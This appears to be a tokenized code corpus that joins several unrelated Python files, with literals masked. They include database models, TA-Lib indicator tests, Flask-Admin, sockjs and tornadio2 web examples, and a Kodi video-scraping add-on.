__unicode__ ( ) <EOL> class AbstractTask ( Document ) : <EOL> """<STR_LIT>""" <EOL> id = StringField ( max_length = <NUM_LIT:200> , default = '<STR_LIT>' , primary_key = True ) <EOL> task_type = StringField ( max_length = <NUM_LIT:50> , required = True , db_field = '<STR_LIT>' ) <EOL> batch = ReferenceField ( Batch , reverse_delete_rule = CASCADE ) <EOL> users_count = IntField ( default = <NUM_LIT:0> , db_field = '<STR_LIT>' ) <EOL> users_processed = ListField ( ReferenceField ( User ) , <EOL> db_field = '<STR_LIT>' ) <EOL> users_skipped = ListField ( ReferenceField ( User ) , db_field = '<STR_LIT>' ) <EOL> closed = BooleanField ( default = False ) <EOL> task_data = DictField ( required = True ) <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> def as_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT:id>' : self . id , <EOL> '<STR_LIT>' : self . closed , <EOL> '<STR_LIT:data>' : self . task_data <EOL> } <EOL> def __unicode__ ( self ) : <EOL> return six . text_type ( self . id ) <EOL> def __str__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> class AbstractAnswer ( Document ) : <EOL> """<STR_LIT>""" <EOL> task = ReferenceField ( AbstractTask , reverse_delete_rule = CASCADE ) <EOL> created_by = ReferenceField ( User , reverse_delete_rule = CASCADE , <EOL> db_field = '<STR_LIT>' ) <EOL> created_at = DateTimeField ( db_field = '<STR_LIT>' ) <EOL> task_type = StringField ( max_length = <NUM_LIT:50> , required = True , db_field = '<STR_LIT>' ) <EOL> result = DictField ( ) <EOL> meta = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> } <EOL> @ property <EOL> def corrections ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> @ corrections . 
setter <EOL> def corrections ( self , value ) : <EOL> pass <EOL> @ corrections . deleter <EOL> def corrections ( self ) : <EOL> pass <EOL> def as_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : self . task . as_dict ( ) , <EOL> '<STR_LIT>' : self . result , <EOL> '<STR_LIT:user>' : self . created_by . as_dict ( ) <EOL> } <EOL> def __unicode__ ( self ) : <EOL> return six . text_type ( self . pk ) <EOL> def __str__ ( self ) : <EOL> return self . __unicode__ ( ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . created_by , self . task ) </s>
<s> import numpy as np <EOL> from nose . tools import assert_equals , assert_true , assert_raises <EOL> import talib <EOL> from talib import func <EOL> from talib . test_data import series , assert_np_arrays_equal , assert_np_arrays_not_equal <EOL> def test_input_lengths ( ) : <EOL> a1 = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> a2 = np . arange ( <NUM_LIT:11> , dtype = float ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a2 , a1 , a1 , a1 ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a1 , a2 , a1 , a1 ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a1 , a1 , a2 , a1 ) <EOL> with assert_raises ( Exception ) : <EOL> func . BOP ( a1 , a1 , a1 , a2 ) <EOL> def test_input_nans ( ) : <EOL> a1 = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> a2 = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> a2 [ <NUM_LIT:0> ] = np . nan <EOL> a2 [ <NUM_LIT:1> ] = np . nan <EOL> r1 , r2 = func . AROON ( a1 , a2 , <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( r1 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> assert_np_arrays_equal ( r2 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> ] ) <EOL> r1 , r2 = func . AROON ( a2 , a1 , <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( r1 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> assert_np_arrays_equal ( r2 , [ np . nan , np . nan , np . nan , np . nan , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> ] ) <EOL> def test_unstable_period ( ) : <EOL> a = np . arange ( <NUM_LIT:10> , dtype = float ) <EOL> r = func . EMA ( a , <NUM_LIT:3> ) <EOL> assert_np_arrays_equal ( r , [ np . nan , np . 
nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] ) <EOL> talib . set_unstable_period ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> r = func . EMA ( a , <NUM_LIT:3> ) <EOL> assert_np_arrays_equal ( r , [ np . nan , np . nan , np . nan , np . nan , np . nan , np . nan , np . nan , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] ) <EOL> talib . set_unstable_period ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> def test_MIN ( ) : <EOL> result = func . MIN ( series , timeperiod = <NUM_LIT:4> ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_equals ( len ( series ) , len ( result ) ) <EOL> assert_equals ( result [ i + <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:3> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:4> ] , <NUM_LIT> ) <EOL> values = np . array ( [ np . nan , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> result = func . MIN ( values , timeperiod = <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:5> ] ) <EOL> def test_MAX ( ) : <EOL> result = func . MAX ( series , timeperiod = <NUM_LIT:4> ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_equals ( len ( series ) , len ( result ) ) <EOL> assert_equals ( result [ i + <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:3> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:4> ] , <NUM_LIT> ) <EOL> assert_equals ( result [ i + <NUM_LIT:5> ] , <NUM_LIT> ) <EOL> def test_MOM ( ) : <EOL> values = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:1> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , - <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> result = func . 
MOM ( values , timeperiod = <NUM_LIT:2> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , - <NUM_LIT:1> ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:3> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , np . nan ] ) <EOL> result = func . MOM ( values , timeperiod = <NUM_LIT:4> ) <EOL> assert_np_arrays_equal ( result , [ np . nan , np . nan , np . nan ] ) <EOL> def test_BBANDS ( ) : <EOL> upper , middle , lower = func . BBANDS ( series , timeperiod = <NUM_LIT:20> , <EOL> nbdevup = <NUM_LIT> , nbdevdn = <NUM_LIT> , <EOL> matype = talib . MA_Type . EMA ) <EOL> i = np . where ( ~ np . isnan ( upper ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_true ( len ( upper ) == len ( middle ) == len ( lower ) == len ( series ) ) <EOL> assert_true ( abs ( middle [ i + <NUM_LIT:0> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( lower [ i + <NUM_LIT:0> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( middle [ i + <NUM_LIT> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( lower [ i + <NUM_LIT> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> def test_DEMA ( ) : <EOL> result = func . DEMA ( series ) <EOL> i = np . where ( ~ np . isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_true ( len ( series ) == len ( result ) ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:1> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:2> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:3> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> assert_true ( abs ( result [ i + <NUM_LIT:4> ] - <NUM_LIT> ) < <NUM_LIT> ) <EOL> def test_EMAEMA ( ) : <EOL> result = func . EMA ( series , timeperiod = <NUM_LIT:2> ) <EOL> result = func . EMA ( result , timeperiod = <NUM_LIT:2> ) <EOL> i = np . where ( ~ np . 
isnan ( result ) ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> assert_true ( len ( series ) == len ( result ) ) <EOL> assert_equals ( i , <NUM_LIT:2> ) <EOL> def test_CDL3BLACKCROWS ( ) : <EOL> o = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> h = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> l = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> c = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> result = func . CDL3BLACKCROWS ( o , h , l , c ) <EOL> assert_np_arrays_equal ( result , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:100> , <NUM_LIT:0> , <NUM_LIT:0> ] ) </s>
<s> from flask import Flask <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from wtforms import fields , widgets <EOL> from flask . ext import admin <EOL> from flask . ext . admin . contrib import sqla <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = True <EOL> db = SQLAlchemy ( app ) <EOL> class CKTextAreaWidget ( widgets . TextArea ) : <EOL> def __call__ ( self , field , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return super ( CKTextAreaWidget , self ) . __call__ ( field , ** kwargs ) <EOL> class CKTextAreaField ( fields . TextAreaField ) : <EOL> widget = CKTextAreaWidget ( ) <EOL> class Page ( db . Model ) : <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> name = db . Column ( db . Unicode ( <NUM_LIT:64> ) ) <EOL> text = db . Column ( db . UnicodeText ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class PageAdmin ( sqla . ModelView ) : <EOL> form_overrides = dict ( text = CKTextAreaField ) <EOL> create_template = '<STR_LIT>' <EOL> edit_template = '<STR_LIT>' <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> admin = admin . Admin ( app , name = "<STR_LIT>" ) <EOL> admin . add_view ( PageAdmin ( Page , db . session ) ) <EOL> db . create_all ( ) <EOL> app . run ( debug = True ) </s>
<s> from peewee import PrimaryKeyField <EOL> def get_primary_key ( model ) : <EOL> for n , f in model . _meta . get_sorted_fields ( ) : <EOL> if type ( f ) == PrimaryKeyField or f . primary_key : <EOL> return n <EOL> def parse_like_term ( term ) : <EOL> if term . startswith ( '<STR_LIT>' ) : <EOL> stmt = '<STR_LIT>' % term [ <NUM_LIT:1> : ] <EOL> elif term . startswith ( '<STR_LIT:=>' ) : <EOL> stmt = term [ <NUM_LIT:1> : ] <EOL> else : <EOL> stmt = '<STR_LIT>' % term <EOL> return stmt </s>
<s> def macro ( name ) : <EOL> '''<STR_LIT>''' <EOL> def inner ( view , context , model , column ) : <EOL> m = context . resolve ( name ) <EOL> if not m : <EOL> return m <EOL> return m ( model = model , column = column ) <EOL> return inner </s>
<s> import tornado . ioloop <EOL> import tornado . web <EOL> from sockjs . tornado import SockJSConnection , SockJSRouter <EOL> from multiplex import MultiplexConnection <EOL> class IndexHandler ( tornado . web . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class MultiplexStaticHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class AnnConnection ( SockJSConnection ) : <EOL> def on_open ( self , info ) : <EOL> self . send ( '<STR_LIT>' ) <EOL> def on_message ( self , message ) : <EOL> self . send ( '<STR_LIT>' + message ) <EOL> class BobConnection ( SockJSConnection ) : <EOL> def on_open ( self , info ) : <EOL> self . send ( '<STR_LIT>' ) <EOL> def on_message ( self , message ) : <EOL> self . send ( '<STR_LIT>' + message ) <EOL> class CarlConnection ( SockJSConnection ) : <EOL> def on_open ( self , info ) : <EOL> self . send ( '<STR_LIT>' ) <EOL> self . close ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import logging <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> router = MultiplexConnection . get ( ann = AnnConnection , bob = BobConnection , carl = CarlConnection ) <EOL> EchoRouter = SockJSRouter ( router , '<STR_LIT>' ) <EOL> app = tornado . web . Application ( <EOL> [ ( r"<STR_LIT:/>" , IndexHandler ) , ( r"<STR_LIT>" , MultiplexStaticHandler ) ] + EchoRouter . urls <EOL> ) <EOL> app . listen ( <NUM_LIT> ) <EOL> tornado . ioloop . IOLoop . instance ( ) . start ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from tornado . web import asynchronous <EOL> from sockjs . tornado import proto <EOL> from sockjs . tornado . transports import pollingbase <EOL> from sockjs . tornado . util import bytes_to_str <EOL> LOG = logging . getLogger ( "<STR_LIT>" ) <EOL> class XhrPollingTransport ( pollingbase . PollingTransportBase ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> @ asynchronous <EOL> def post ( self , session_id ) : <EOL> self . preflight ( ) <EOL> self . handle_session_cookie ( ) <EOL> self . disable_cache ( ) <EOL> if not self . _attach_session ( session_id , False ) : <EOL> return <EOL> if not self . session : <EOL> return <EOL> if not self . session . send_queue : <EOL> self . session . start_heartbeat ( ) <EOL> else : <EOL> self . session . flush ( ) <EOL> def send_pack ( self , message , binary = False ) : <EOL> if binary : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . active = False <EOL> try : <EOL> self . set_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> self . set_header ( '<STR_LIT>' , len ( message ) + <NUM_LIT:1> ) <EOL> self . write ( message + '<STR_LIT:\n>' ) <EOL> self . flush ( callback = self . send_complete ) <EOL> except IOError : <EOL> self . session . delayed_close ( ) <EOL> class XhrSendHandler ( pollingbase . PollingTransportBase ) : <EOL> def post ( self , session_id ) : <EOL> self . preflight ( ) <EOL> self . handle_session_cookie ( ) <EOL> self . disable_cache ( ) <EOL> session = self . _get_session ( session_id ) <EOL> if session is None or session . is_closed : <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> data = self . request . body <EOL> if not data : <EOL> self . write ( "<STR_LIT>" ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> try : <EOL> messages = proto . json_decode ( bytes_to_str ( data ) ) <EOL> except : <EOL> self . write ( "<STR_LIT>" ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> try : <EOL> session . 
on_messages ( messages ) <EOL> except Exception : <EOL> LOG . exception ( '<STR_LIT>' ) <EOL> session . close ( ) <EOL> self . set_status ( <NUM_LIT> ) <EOL> return <EOL> self . set_status ( <NUM_LIT> ) <EOL> self . set_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) </s>
<s> from os import path as op <EOL> import tornado . web <EOL> import tornadio2 <EOL> import tornadio2 . router <EOL> import tornadio2 . server <EOL> import tornadio2 . conn <EOL> ROOT = op . normpath ( op . dirname ( __file__ ) ) <EOL> class IndexHandler ( tornado . web . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class SocketIOHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . render ( '<STR_LIT>' ) <EOL> class WebSocketFileHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . set_header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> with open ( op . join ( ROOT , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as f : <EOL> self . write ( f . read ( ) ) <EOL> self . finish ( ) <EOL> class ChatConnection ( tornadio2 . conn . SocketConnection ) : <EOL> participants = set ( ) <EOL> def on_open ( self , info ) : <EOL> self . send ( "<STR_LIT>" ) <EOL> self . participants . add ( self ) <EOL> def on_message ( self , message ) : <EOL> for p in self . participants : <EOL> p . send ( message ) <EOL> def on_close ( self ) : <EOL> self . participants . remove ( self ) <EOL> ChatRouter = tornadio2 . router . TornadioRouter ( ChatConnection , dict ( websocket_check = True ) ) <EOL> application = tornado . web . Application ( <EOL> ChatRouter . apply_routes ( [ ( r"<STR_LIT:/>" , IndexHandler ) , <EOL> ( r"<STR_LIT>" , SocketIOHandler ) , <EOL> ( r"<STR_LIT>" , WebSocketFileHandler ) <EOL> ] ) , <EOL> flash_policy_port = <NUM_LIT> , <EOL> flash_policy_file = op . join ( ROOT , '<STR_LIT>' ) , <EOL> socket_io_port = <NUM_LIT> <EOL> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import logging <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> tornadio2 . server . SocketServer ( application , ssl_options = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) </s>
<s> import urllib , urllib2 , re , os , sys , math <EOL> import xbmcgui , xbmc , xbmcaddon , xbmcplugin <EOL> from BeautifulSoup import BeautifulSoup <EOL> import urllib <EOL> import mrknow_pLog , mrknow_pCommon , mrknow_Parser , mrknow_Player , mrknow_Pageparser <EOL> scriptID = '<STR_LIT>' <EOL> scriptname = "<STR_LIT>" <EOL> ptv = xbmcaddon . Addon ( scriptID ) <EOL> BASE_RESOURCE_PATH = os . path . join ( ptv . getAddonInfo ( '<STR_LIT:path>' ) , "<STR_LIT>" ) <EOL> sys . path . append ( os . path . join ( BASE_RESOURCE_PATH , "<STR_LIT>" ) ) <EOL> mainUrl = '<STR_LIT>' <EOL> MENU_TAB = { <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> } <EOL> class bajkipopolsku : <EOL> def __init__ ( self ) : <EOL> self . cm = mrknow_pCommon . common ( ) <EOL> self . parser = mrknow_Parser . mrknow_Parser ( ) <EOL> self . pp1 = mrknow_Pageparser . mrknow_Pageparser ( ) <EOL> self . player = mrknow_Player . mrknow_Player ( ) <EOL> self . log = mrknow_pLog . pLog ( ) <EOL> self . log . info ( '<STR_LIT>' ) <EOL> def listsMainMenu ( self , table ) : <EOL> for num , val in table . items ( ) : <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , val , '<STR_LIT:None>' , '<STR_LIT:None>' , '<STR_LIT:None>' , '<STR_LIT:None>' , '<STR_LIT:None>' , True , False ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def getSearchURL ( self , key ) : <EOL> url = urllib . quote_plus ( key ) <EOL> return url <EOL> def listsCategoriesMenu ( self , url ) : <EOL> HEADER = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : self . cm . randomagent ( ) } <EOL> query_data = { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True , '<STR_LIT>' : HEADER , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True } <EOL> link = self . cm . getURLRequestData ( query_data ) <EOL> soup = BeautifulSoup ( link ) <EOL> linki_ost1 = soup . 
find ( '<STR_LIT>' , { "<STR_LIT:id>" : "<STR_LIT>" } ) <EOL> linki_all1 = linki_ost1 . findAll ( '<STR_LIT>' ) <EOL> for mylink in linki_all1 : <EOL> self . log ( "<STR_LIT>" % ( mylink . a . text , mylink . a [ '<STR_LIT>' ] ) ) <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , self . cm . html_special_chars ( mylink . a . text . encode ( '<STR_LIT:utf-8>' ) ) , '<STR_LIT:None>' , '<STR_LIT:None>' , mylink . a [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:None>' , True , False ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def listsItems ( self , url ) : <EOL> HEADER = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : self . cm . randomagent ( ) } <EOL> query_data = { '<STR_LIT:url>' : url , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True , '<STR_LIT>' : HEADER , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True } <EOL> link = self . cm . getURLRequestData ( query_data ) <EOL> soup = BeautifulSoup ( link ) <EOL> linki_ost = soup . find ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> if linki_ost : <EOL> linki_all = linki_ost . findAll ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> for mylink in linki_all : <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:None>' , self . cm . html_special_chars ( mylink . img [ '<STR_LIT>' ] . encode ( '<STR_LIT:utf-8>' ) ) , mylink . img [ '<STR_LIT:src>' ] , mylink . a [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:None>' , False , True ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def listsItems2 ( self , url ) : <EOL> HEADER = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : self . cm . randomagent ( ) } <EOL> query_data = { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True , '<STR_LIT>' : HEADER , '<STR_LIT>' : False , '<STR_LIT>' : False , '<STR_LIT>' : True } <EOL> link = self . cm . 
getURLRequestData ( query_data ) <EOL> soup = BeautifulSoup ( link ) <EOL> linki_ost = soup . find ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> if linki_ost : <EOL> linki_all = linki_ost . findAll ( '<STR_LIT>' , { "<STR_LIT:class>" : "<STR_LIT>" } ) <EOL> for mylink in linki_all : <EOL> self . add ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:None>' , self . cm . html_special_chars ( mylink . text . encode ( '<STR_LIT:utf-8>' ) ) , mylink . img [ '<STR_LIT:src>' ] , mylink . a [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT:None>' , False , True ) <EOL> xbmcplugin . endOfDirectory ( int ( sys . argv [ <NUM_LIT:1> ] ) ) <EOL> def searchInputText ( self ) : <EOL> text = None <EOL> k = xbmc . Keyboard ( ) <EOL> k . doModal ( ) <EOL> if ( k . isConfirmed ( ) ) : <EOL> text = k . getText ( ) <EOL> return text <EOL> def add ( self , service , name , category , title , iconimage , url , desc , rating , folder = True , isPlayable = True , strona = '<STR_LIT>' ) : <EOL> u = sys . argv [ <NUM_LIT:0> ] + "<STR_LIT>" + service + "<STR_LIT>" + name + "<STR_LIT>" + category + "<STR_LIT>" + title + "<STR_LIT>" + urllib . quote_plus ( url ) + "<STR_LIT>" + urllib . quote_plus ( iconimage ) + "<STR_LIT>" + urllib . quote_plus ( strona ) <EOL> if name == '<STR_LIT>' or name == '<STR_LIT>' : <EOL> title = category <EOL> if iconimage == '<STR_LIT>' : <EOL> iconimage = "<STR_LIT>" <EOL> liz = xbmcgui . ListItem ( title , iconImage = "<STR_LIT>" , thumbnailImage = iconimage ) <EOL> if isPlayable : <EOL> liz . setProperty ( "<STR_LIT>" , "<STR_LIT:true>" ) <EOL> liz . setInfo ( type = "<STR_LIT>" , infoLabels = { "<STR_LIT>" : title } ) <EOL> xbmcplugin . addDirectoryItem ( handle = int ( sys . argv [ <NUM_LIT:1> ] ) , url = u , listitem = liz , isFolder = folder ) <EOL> def handleService ( self ) : <EOL> params = self . parser . getParams ( ) <EOL> name = self . parser . getParam ( params , "<STR_LIT:name>" ) <EOL> category = self . parser . 
getParam ( params , "<STR_LIT>" ) <EOL> url = self . parser . getParam ( params , "<STR_LIT:url>" ) <EOL> title = self . parser . getParam ( params , "<STR_LIT:title>" ) <EOL> icon = self . parser . getParam ( params , "<STR_LIT>" ) <EOL> strona = self . parser . getParam ( params , "<STR_LIT>" ) <EOL> if strona == None : <EOL> strona = '<STR_LIT:1>' <EOL> print ( "<STR_LIT>" , strona ) <EOL> print ( "<STR_LIT:name>" , name ) <EOL> print ( "<STR_LIT>" , category ) <EOL> if name == None : <EOL> self . listsMainMenu ( MENU_TAB ) <EOL> elif name == '<STR_LIT>' and category == '<STR_LIT>' : <EOL> self . listsItems2 ( mainUrl ) <EOL> elif name == '<STR_LIT>' and category == "<STR_LIT>" : <EOL> self . listsCategoriesMenu ( mainUrl ) <EOL> elif name == '<STR_LIT>' and category == "<STR_LIT>" : <EOL> key = self . searchInputText ( ) <EOL> self . listsItems2 ( '<STR_LIT>' , self . getSearchURL ( key ) ) <EOL> elif name == '<STR_LIT>' and category != '<STR_LIT:None>' : <EOL> self . listsItems ( url ) <EOL> if name == '<STR_LIT>' : <EOL> self . log . info ( '<STR_LIT>' + str ( url ) ) <EOL> mojeurl = self . pp1 . getVideoLink ( url ) <EOL> self . player . LOAD_AND_PLAY_VIDEO ( mojeurl , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> __version__ = '<STR_LIT>' </s>
